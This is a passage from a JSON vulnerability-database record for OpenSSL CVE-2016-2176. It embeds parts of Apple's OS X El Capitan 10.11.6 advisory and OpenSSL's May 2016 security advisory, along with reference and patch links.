improved memory\nmanagement. \nCVE-2016-4625 : Ian Beer of Google Project Zero\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to execute arbitrary code with\nkernel privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1863 : Ian Beer of Google Project Zero\nCVE-2016-1864 : Ju Zhu of Trend Micro\nCVE-2016-4582 : Shrek_wzw and Proteas of Qihoo 360 Nirvan Team\n\nKernel\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a system denial of service\nDescription: A null pointer dereference was addressed through\nimproved input validation. \nCVE-2016-1865 : CESG, Marco Grassi (@marcograss) of KeenLab\n(@keen_lab), Tencent\n\nlibc++abi\nAvailable for: OS X El Capitan v10.11 and later\nImpact: An application may be able to execute arbitrary code with\nroot privileges\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4621 : an anonymous researcher\n\nlibexpat\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing maliciously crafted XML may lead to unexpected\napplication termination or arbitrary code execution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-0718 : Gustavo Grieco\n\nLibreSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in LibreSSL before 2.2.7. These\nwere addressed by updating LibreSSL to version 2.2.7. \nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google) Mark Brand,\nIan Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Parsing a maliciously crafted XML document may lead to\ndisclosure of user information\nDescription: An access issue existed in the parsing of maliciously\ncrafted XML files. This issue was addressed through improved input\nvalidation. \nCVE-2016-4449 : Kostya Serebryany\n\nlibxml2\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxml2\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4447 : Wei Lei and Liu Yang of Nanyang Technological\nUniversity\nCVE-2016-4448 : Apple\nCVE-2016-4483 : Gustavo Grieco\nCVE-2016-4614 : Nick Wellnhofe\nCVE-2016-4615 : Nick Wellnhofer\nCVE-2016-4616 : Michael Paddon\nCVE-2016-4619 : Hanno Boeck\n\nlibxslt\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\nand OS X El Capitan v10.11 and later\nImpact: Multiple vulnerabilities in libxslt\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-1684 : Nicolas GrA(c)goire\nCVE-2016-4607 : Nick Wellnhofer\nCVE-2016-4608 : Nicolas GrA(c)goire\nCVE-2016-4609 : Nick Wellnhofer\nCVE-2016-4610 : Nick Wellnhofer\nCVE-2016-4612 : Nicolas GrA(c)goire\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to compromise of user information\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4640 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to execute arbitrary\ncode leading to the compromise of user information\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4641 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local user may be able to cause a denial of service\nDescription: A memory initialization issue was addressed through\nimproved memory handling. \nCVE-2016-4639 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nLogin Window\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A malicious application may be able to gain root privileges\nDescription: A type confusion issue was addressed through improved\nmemory handling. \nCVE-2016-4638 : Yubin Fu of Tencent KeenLab working with Trend\nMicro\u0027s Zero Day Initiative\n\nOpenSSL\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A remote attacker may be able to execute arbitrary code\nDescription: Multiple issues existed in OpenSSL. \nCVE-2016-2105 : Guido Vranken\nCVE-2016-2106 : Guido Vranken\nCVE-2016-2107 : Juraj Somorovsky\nCVE-2016-2108 : Huzaifa Sidhpurwala (Red Hat), Hanno Boeck, David Benjamin (Google), Mark Brand and Ian Beer of Google Project Zero\nCVE-2016-2109 : Brian Carpenter\nCVE-2016-2176 : Guido Vranken\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted FlashPix Bitmap Image may\nlead to unexpected application termination or arbitrary code\nexecution\nDescription: Multiple memory corruption issues were addressed\nthrough improved memory handling. \nCVE-2016-4596 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4597 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4600 : Ke Liu of Tencent\u0027s Xuanwu Lab\nCVE-2016-4602 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted image may lead to arbitrary\ncode execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4598 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted SGI file may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4601 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nQuickTime\nAvailable for: OS X El Capitan v10.11 and later\nImpact: Processing a maliciously crafted Photoshop document may lead\nto unexpected application termination or arbitrary code execution\nDescription: A memory corruption issue was addressed through\nimproved input validation. \nCVE-2016-4599 : Ke Liu of Tencent\u0027s Xuanwu Lab\n\nSafari Login AutoFill\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A user\u0027s password may be visible on screen\nDescription: An issue existed in Safari\u0027s password auto-fill. This\nissue was addressed through improved matching of form fields. \nCVE-2016-4595 : Jonathan Lewis from DeARX Services (PTY) LTD\n\nSandbox Profiles\nAvailable for: OS X El Capitan v10.11 and later\nImpact: A local application may be able to access the process list\nDescription: An access issue existed with privileged API calls. This\nissue was addressed through additional restrictions. \nCVE-2016-4594 : Stefan Esser of SektionEins\n\nNote: OS X El Capitan 10.11.6 includes the security content of Safari\n9.1.2. For further details see https://support.apple.com/kb/HT206900\n\n\nOS X El Capitan v10.11.6 and Security Update 2016-004 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\nComment: GPGTools - https://gpgtools.org\n\niQIcBAEBCgAGBQJXjXAvAAoJEIOj74w0bLRG/5EP/2v9SJTrO+/4b3A1gqC1ch8y\n+cJ04tXRsO7rvjKT5nCylo30U0Sanz/bUbDx4559YS7/P/IyeyZVheaTJwK8wzEy\npSOPpy35hUuVIw0/p4YsuHDThSBPFMmDljTxH7elkfuBV1lPSrCkyDXc0re2HxWV\nxj68zAxtM0jkkhgcxb2ApZSZVXhrjUZtbY0xEVOoWKKFwbMvKfx+4xSqunwQeS1u\nwevs1EbxfvsZbc3pG+xYcOonbegBzOy9aCvNO1Yv1zG+AYXC5ERMq1vk3PsWOTQN\nZVY1I7mvCaEfvmjq2isRw8XYapAIKISDLwMKBSYrZDQFwPQLRi1VXxQZ67Kq1M3k\nah04/lr0RIcoosIcBqxD2+1UAFjUzEUNFkYivjhuaeegN2QdL7Ujegf1QjdAt8lk\nmmKduxYUDOaRX50Kw7n14ZveJqzE1D5I6QSItaZ9M1vR60a7u91DSj9D87vbt1YC\nJM/Rvf/4vonp1NjwA2JQwCiZfYliBDdn9iiCl8mzxdsSRD/wXcZCs05nnKmKsCfc\n55ET7IwdG3622lVheOJGQZuucwJiTn36zC11XVzZysQd/hLD5rUKUQNX1WOgZdzs\nxPsslXF5MWx9jcdyWVSWxDrN0sFk+GpQFQDuVozP60xuxqR3qQ0TXir2NP39uIF5\nYozOGPQFmX0OviWCQsX6\n=ng+m\n-----END PGP SIGNATURE-----\n. The bug\ncausing the vulnerability was fixed on April 18th 2015, and released\nas part of the June 11th 2015 security releases. The security impact\nof the bug was not known at the time. \n\nIn previous versions of OpenSSL, ASN.1 encoding the value zero\nrepresented as a negative integer can cause a buffer underflow\nwith an out-of-bounds write in i2c_ASN1_INTEGER. The ASN.1 parser does\nnot normally create \"negative zeroes\" when parsing ASN.1 input, and\ntherefore, an attacker cannot trigger this bug. \n\nHowever, a second, independent bug revealed that the ASN.1 parser\n(specifically, d2i_ASN1_TYPE) can misinterpret a large universal tag\nas a negative zero value. Large universal tags are not present in any\ncommon ASN.1 structures (such as X509) but are accepted as part of ANY\nstructures. \n\nTherefore, if an application deserializes untrusted ASN.1 structures\ncontaining an ANY field, and later reserializes them, an attacker may\nbe able to trigger an out-of-bounds write. This has been shown to\ncause memory corruption that is potentially exploitable with some\nmalloc implementations. \n\nApplications that parse and re-encode X509 certificates are known to\nbe vulnerable. Applications that verify RSA signatures on X509\ncertificates may also be vulnerable; however, only certificates with\nvalid signatures trigger ASN.1 re-encoding and hence the\nbug. Specifically, since OpenSSL\u0027s default TLS X509 chain verification\ncode verifies the certificate chain from root to leaf, TLS handshakes\ncould only be targeted with valid certificates issued by trusted\nCertification Authorities. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2c\nOpenSSL 1.0.1 users should upgrade to 1.0.1o\n\nThis vulnerability is a combination of two bugs, neither of which\nindividually has security impact. The first bug (mishandling of\nnegative zero integers) was reported to OpenSSL by Huzaifa Sidhpurwala\n(Red Hat) and independently by Hanno B\u00f6ck in April 2015. The second\nissue (mishandling of large universal tags) was found using libFuzzer,\nand reported on the public issue tracker on March 1st 2016. The fact\nthat these two issues combined present a security vulnerability was\nreported by David Benjamin (Google) on March 31st 2016. The fixes were\ndeveloped by Steve Henson of the OpenSSL development team, and David\nBenjamin. The OpenSSL team would also like to thank Mark Brand and\nIan Beer from the Google Project Zero team for their careful analysis\nof the impact. \n\nThe fix for the \"negative zero\" memory corruption bug can be\nidentified by commits\n\n3661bb4e7934668bd99ca777ea8b30eedfafa871 (1.0.2)\nand\n32d3b0f52f77ce86d53f38685336668d47c5bdfe (1.0.1)\n\nPadding oracle in AES-NI CBC MAC check (CVE-2016-2107)\n======================================================\n\nSeverity: High\n\nA MITM attacker can use a padding oracle attack to decrypt traffic\nwhen the connection uses an AES CBC cipher and the server support\nAES-NI. \n\nThis issue was introduced as part of the fix for Lucky 13 padding\nattack (CVE-2013-0169). The padding check was rewritten to be in\nconstant time by making sure that always the same bytes are read and\ncompared against either the MAC or padding bytes. But it no longer\nchecked that there was enough data to have both the MAC and padding\nbytes. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2h\nOpenSSL 1.0.1 users should upgrade to 1.0.1t\n\nThis issue was reported to OpenSSL on 13th of April 2016 by Juraj\nSomorovsky using TLS-Attacker. The fix was developed by Kurt Roeckx\nof the OpenSSL development team. \n\nEVP_EncodeUpdate overflow (CVE-2016-2105)\n=========================================\n\nSeverity: Low\n\nAn overflow can occur in the EVP_EncodeUpdate() function which is used for\nBase64 encoding of binary data. If an attacker is able to supply very large\namounts of input data then a length check can overflow resulting in a heap\ncorruption. \n\nInternally to OpenSSL the EVP_EncodeUpdate() function is primarly used by the\nPEM_write_bio* family of functions. These are mainly used within the OpenSSL\ncommand line applications. These internal uses are not considered vulnerable\nbecause all calls are bounded with length checks so no overflow is possible. \nUser applications that call these APIs directly with large amounts of untrusted\ndata may be vulnerable. (Note: Initial analysis suggested that the\nPEM_write_bio* were vulnerable, and this is reflected in the patch commit\nmessage. This is no longer believed to be the case). \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2h\nOpenSSL 1.0.1 users should upgrade to 1.0.1t\n\nThis issue was reported to OpenSSL on 3rd March 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nEVP_EncryptUpdate overflow (CVE-2016-2106)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in the EVP_EncryptUpdate() function. If an attacker is\nable to supply very large amounts of input data after a previous call to\nEVP_EncryptUpdate() with a partial block then a length check can overflow\nresulting in a heap corruption. Following an analysis of all OpenSSL internal\nusage of the EVP_EncryptUpdate() function all usage is one of two forms. \nThe first form is where the EVP_EncryptUpdate() call is known to be the first\ncalled function after an EVP_EncryptInit(), and therefore that specific call\nmust be safe. The second form is where the length passed to EVP_EncryptUpdate()\ncan be seen from the code to be some small value and therefore there is no\npossibility of an overflow. Since all instances are one of these two forms, it\nis believed that there can be no overflows in internal code due to this problem. \nIt should be noted that EVP_DecryptUpdate() can call EVP_EncryptUpdate() in\ncertain code paths. Also EVP_CipherUpdate() is a synonym for\nEVP_EncryptUpdate(). All instances of these calls have also been analysed too\nand it is believed there are no instances in internal usage where an overflow\ncould occur. \n\nThis could still represent a security issue for end user code that calls this\nfunction directly. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2h\nOpenSSL 1.0.1 users should upgrade to 1.0.1t\n\nThis issue was reported to OpenSSL on 3rd March 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nASN.1 BIO excessive memory allocation (CVE-2016-2109)\n=====================================================\n\nSeverity: Low\n\nWhen ASN.1 data is read from a BIO using functions such as d2i_CMS_bio()\na short invalid encoding can casuse allocation of large amounts of memory\npotentially consuming excessive resources or exhausting memory. \n\nAny application parsing untrusted data through d2i BIO functions is affected. \nThe memory based functions such as d2i_X509() are *not* affected. Since the\nmemory based functions are used by the TLS library, TLS applications are not\naffected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2h\nOpenSSL 1.0.1 users should upgrade to 1.0.1t\n\nThis issue was reported to OpenSSL on 4th April 2016 by Brian Carpenter. \nThe fix was developed by Stephen Henson of the OpenSSL development team. \n\nEBCDIC overread (CVE-2016-2176)\n===============================\n\nSeverity: Low\n\nASN1 Strings that are over 1024 bytes can cause an overread in applications\nusing the X509_NAME_oneline() function on EBCDIC systems. This could result in\narbitrary stack data being returned in the buffer. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2h\nOpenSSL 1.0.1 users should upgrade to 1.0.1t\n\nThis issue was reported to OpenSSL on 5th March 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160503.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2016-2176" }, { "db": "JVNDB", "id": "JVNDB-2016-002477" }, { "db": "BID", "id": "89746" }, { "db": "VULMON", "id": "CVE-2016-2176" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136893" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "169652" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2176", "trust": 3.4 }, { "db": "BID", "id": "89746", "trust": 2.0 }, { "db": "PULSESECURE", "id": "SA40202", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-18", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "SECTRACK", "id": "1035721", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10160", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "136912", "trust": 1.7 }, { "db": "BID", "id": "91787", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU93163809", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU94844193", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-002477", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201605-084", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-2176", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "142803", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140056", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136893", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143513", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "137958", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169652", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2176" }, { "db": "BID", "id": "89746" }, { "db": "JVNDB", "id": "JVNDB-2016-002477" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136893" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "169652" }, { "db": "CNNVD", "id": "CNNVD-201605-084" }, { "db": "NVD", "id": "CVE-2016-2176" } ] }, "id": "VAR-201605-0037", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.4305209371428571 }, "last_update_date": "2024-07-23T20:35:57.230000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html" }, { "title": "HT206903", "trust": 0.8, "url": "https://support.apple.com/en-us/ht206903" }, { "title": "HT206903", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht206903" }, { "title": "SB10160", "trust": 0.8, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160" }, { "title": "NV16-015", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv16-015.html" }, { "title": "Major changes between OpenSSL 1.0.1s and OpenSSL 1.0.1t [3 May 2016]", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "Major changes between OpenSSL 1.0.2g and OpenSSL 1.0.2h [3 May 2016]", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "Prevent EBCDIC overread for very long strings", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=2919516136a4227d9e6d8f2fe66ef976aaf8c561" }, { "title": "EBCDIC overread (CVE-2016-2176)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv/20160503.txt" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016verbose-2881725.html" }, { "title": "Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "title": "SA40202", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202" }, { "title": "October 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2016_critical_patch_update" }, { "title": "JSA10759", "trust": 0.8, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759\u0026actp=search" }, { "title": "TLSA-2016-14", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-14j.html" }, { "title": "OpenSSL Security vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=61409" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/05/03/openssl_patches/" }, { "title": "Red Hat: CVE-2016-2176", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2176" }, { "title": "Tenable Security Advisories: [R5] OpenSSL \u002720160503\u0027 Advisory Affects Tenable Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-10" }, { "title": "Tenable Security Advisories: [R3] PVS 5.1.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-13" }, { "title": "Symantec Security Advisories: SA123 : OpenSSL Vulnerabilities 3-May-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=5d65f6765e60e5fe9e6998a5bde1aadc" }, { "title": "Forcepoint Security Advisories: CVE-2016-2105, 2106, 2107, 2108, 2109, 2176 -- Security Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=01fd01e3d154696ffabfde89f4142310" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Tenable Security Advisories: [R7] LCE 4.8.1 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-18" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-2176 " }, { "title": "alpine-cvecheck", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " }, { "title": "", "trust": 0.1, "url": "https://github.com/imhunterand/hackerone-publicy-disclosed " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2176" }, { "db": "JVNDB", "id": "JVNDB-2016-002477" }, { "db": "CNNVD", "id": "CNNVD-201605-084" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-002477" }, { "db": "NVD", "id": "CVE-2016-2176" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.2, "url": "https://www.openssl.org/news/secadv/20160503.txt" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160504-openssl" }, { "trust": 1.8, "url": "http://www.securityfocus.com/bid/89746" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201612-16" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160" }, { "trust": 1.7, "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html" }, { "trust": 1.7, "url": "https://support.apple.com/ht206903" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/91787" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.7, "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2016\u0026m=slackware-security.542103" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1035721" }, { "trust": 1.7, "url": "https://bto.bluecoat.com/security-advisory/sa123" }, { "trust": 1.7, "url": "http://packetstormsecurity.com/files/136912/slackware-security-advisory-openssl-updates.html" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-18" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03756en_us" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03765en_us" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20160504-0001/" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=2919516136a4227d9e6d8f2fe66ef976aaf8c561" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2176" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu93163809/" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu94844193/" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2176" }, { "trust": 0.8, "url": "http://www.aratana.jp/security/detail.php?id=16" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.6, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=2919516136a4227d9e6d8f2fe66ef976aaf8c561" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2016/may/25" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023814" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024078" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099429" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000158" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021376" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/56?aspxautodetectcookiesupport=1" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "https://support.asperasoft.com/hc/en-us/articles/229505687-security-bulletin-multiple-openssl-vulnerabilities-affect-ibm-aspera-shares-1-9-2-or-earlier-%20-ibm-aspera-console-3-0-6-or-earlier" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024066" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009147" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983158" }, { "trust": 0.3, "url": 